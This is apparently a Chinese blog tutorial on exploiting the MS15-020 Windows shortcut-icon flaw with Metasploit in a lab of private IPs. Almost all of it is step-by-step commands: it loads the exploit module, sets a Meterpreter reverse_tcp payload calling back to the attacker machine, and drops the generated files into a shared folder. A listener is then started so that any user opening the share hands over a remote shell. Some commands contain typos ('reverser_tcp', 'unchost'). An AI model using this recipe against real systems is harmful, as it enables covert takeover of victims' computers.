环境:
共享机/受害者:windows xp IP:192.168.222.1
攻击机:kali linux IP:192.168.10.1

1
2
3
4
5
6
7
8
9
10
msfconsole  //在kali终端输入msfconsole进入控制台

search ms15-020 //搜索ms15-020漏洞

use exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader //使用该模块

show options //显示所有参数

set payload windows/meterpreter/reverse_tcp //设置payload

这里写图片描述

设置参数:

1
2
3
4
set unchost 192.168.222.1 //共享的主机地址
set uncshare //共享的文件夹名
set lhost 192.168.10.1 //攻击机IP地址
exploit

这里写图片描述

运行后会生成三个文件,将三个文件放到共享机的share目录下。

继续在msf中使用handler进行监听:

1
2
3
4
use exploit/multi/handler
set payload windows/meterpreter/reverser_tcp
set lhost 192.168.10.1
exploit

这里写图片描述

以上设置完成之后在当别的用户再访问这个共享文件夹时就可以直接获得meterpreter

这里写图片描述
这里写图片描述